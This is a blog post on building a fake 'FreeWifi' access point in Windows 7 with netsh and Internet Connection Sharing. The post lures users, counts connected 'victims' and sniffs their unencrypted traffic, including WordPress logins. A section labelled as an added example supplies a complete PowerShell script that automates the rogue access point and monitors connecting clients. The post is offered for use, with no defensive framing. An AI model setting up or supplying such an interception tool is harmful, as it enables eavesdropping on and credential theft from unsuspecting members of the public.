
Fake AP in 2 seconds December 30, 2011

Posted by michelemanzotti in manzotti.eu, Security, Windows.

Making a fake access point in Windows 7 is now really simple. Thanks to the Wireless Hosted Network technology introduced in Windows 7 and Windows Server 2008 R2, a single physical Wi-Fi adapter can also act as a software access point, and the machine can share its Internet connection to it from either a wired LAN or a Wi-Fi interface using Internet Connection Sharing.

First off we need to create the new Wi-Fi interface (the Microsoft Virtual WiFi Miniport Adapter) by setting the hosted network's SSID and key. A hosted network cannot be created without authentication: it always uses WPA2-PSK with a key of at least 8 characters, so there is no open-network option. A good strategy is therefore to put the key in the SSID itself, so people can connect without being told anything:

C:\Windows\System32>netsh wlan set hostednetwork mode=allow ssid="FreeWifi Key:12345678" key=12345678
The hosted network mode has been set to allow.
The SSID of the hosted network has been successfully changed.
The user key passphrase of the hosted network has been successfully changed.

Then we need to select the interface from which we want to share our Internet connection. Go to Control Panel -> Network and Internet -> Network Connections, right-click the Wi-Fi or LAN interface that has Internet access, choose Properties -> Sharing, tick "Allow other network users to connect through this computer's Internet connection" and, in the "Home networking connection" list, select the second Wireless Network Connection created right before. For this example I used the LAN interface as in the following picture.

Finally, we need to turn on the new Wi-Fi network:

C:\Windows\System32>netsh wlan start hostednetwork
The hosted network started.

and that's it! Now we wait…

Now, to see whether a victim has connected to our fake access point, we use the following command:

C:\Windows\System32>netsh wlan show hostednetwork

Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "FreeWifi Key:12345678"
    Max number of clients  : 100
    Authentication         : WPA2-Personal
    Cipher                 : CCMP

Hosted network status
---------------------
    Status                 : Started
    BSSID                  : ac:81:12:6f:eb:46
    Radio type             : 802.11b
    Channel                : 11
    Number of clients      : 1
        xx:xx:xx:xx:xx:xx        Authenticated
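The three setup steps above and the client check can be put into one script. The following is an added example, not code from the original post: PowerShell meant for an elevated prompt on Windows 7 / Server 2008 R2. The uplink interface name "Local Area Connection", the "Virtual WiFi" device-name match used to find the hosted network adapter, and the use of the HNetCfg.HNetShare COM interface as the scripted form of the Sharing tab are assumptions about the machine, not something the post shows.

```powershell
# Added example (not from the original post): scripts the setup steps above from an elevated
# PowerShell prompt, then polls the hosted network and reports clients as they associate.
# Assumptions: the uplink is named "Local Area Connection" (change to match your box) and the
# hosted network adapter's DeviceName contains "Virtual WiFi" (Microsoft Virtual WiFi Miniport Adapter).
param(
    [string]$Uplink      = 'Local Area Connection',   # interface whose Internet access is shared
    [string]$Ssid        = 'FreeWifi Key:12345678',   # key advertised in the SSID, as in the post
    [string]$Key         = '12345678',                # WPA2-PSK, 8-63 chars; hostednetwork requires it
    [int]   $PollSeconds = 5
)

# Step 1: define the hosted network (SSID + WPA2-PSK key) and start it so the virtual adapter appears.
netsh wlan set hostednetwork mode=allow ssid="$Ssid" key="$Key" | Out-Null
netsh wlan start hostednetwork | Out-Null

# Step 2: Internet Connection Sharing, the scripted equivalent of Properties -> Sharing in the GUI.
# The uplink is the "public" side (0 = ICSSHARINGTYPE_PUBLIC); the hosted network adapter is the
# "private" side (1 = ICSSHARINGTYPE_PRIVATE) that clients get DHCP and NAT from.
$hnet    = New-Object -ComObject HNetCfg.HNetShare
$conns   = @($hnet.EnumEveryConnection)
$public  = $conns | Where-Object { $hnet.NetConnectionProps.Invoke($_).Name -eq $Uplink } | Select-Object -First 1
$private = $conns | Where-Object { $hnet.NetConnectionProps.Invoke($_).DeviceName -like '*Virtual WiFi*' } | Select-Object -First 1
if (-not $public -or -not $private) {
    throw "Could not find uplink '$Uplink' or the hosted network adapter; check 'netsh wlan show hostednetwork'."
}
$hnet.INetSharingConfigurationForINetConnection.Invoke($public).EnableSharing(0)
$hnet.INetSharingConfigurationForINetConnection.Invoke($private).EnableSharing(1)

# Step 3: parse 'netsh wlan show hostednetwork'. Client lines look like
# "    ac:81:12:6f:eb:46        Authenticated"; the BSSID line has a label before the MAC,
# so the anchored regex below does not match it.
function Get-HostedNetworkClients {
    netsh wlan show hostednetwork | ForEach-Object {
        if ($_ -match '^\s+((?:[0-9a-f]{2}:){5}[0-9a-f]{2})\s+(\S+)') {
            [pscustomobject]@{ Mac = $Matches[1]; State = $Matches[2] }
        }
    }
}

# Report each new MAC once, with the time it was first seen.
$seen = @{}
while ($true) {
    foreach ($c in Get-HostedNetworkClients) {
        if (-not $seen.ContainsKey($c.Mac)) {
            $seen[$c.Mac] = Get-Date
            Write-Host ('{0:HH:mm:ss} new client {1} ({2})' -f $seen[$c.Mac], $c.Mac, $c.State)
        }
    }
    Start-Sleep -Seconds $PollSeconds
}
```

If `netsh wlan start hostednetwork` fails, check `netsh wlan show drivers` for "Hosted network supported : Yes"; the feature depends on the Wi-Fi driver. ICS allows only one shared pair at a time, so disable any existing sharing first. Note that the WPA2 key does nothing for the clients' confidentiality here: the operator of the access point terminates the encryption and sees every unencrypted request, which is the point of the post.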

Obviously, since we control the network, we can sniff the traffic, and all unencrypted traffic will be visible, as shown in the following HTTP WordPress authentication capture:

Have fun.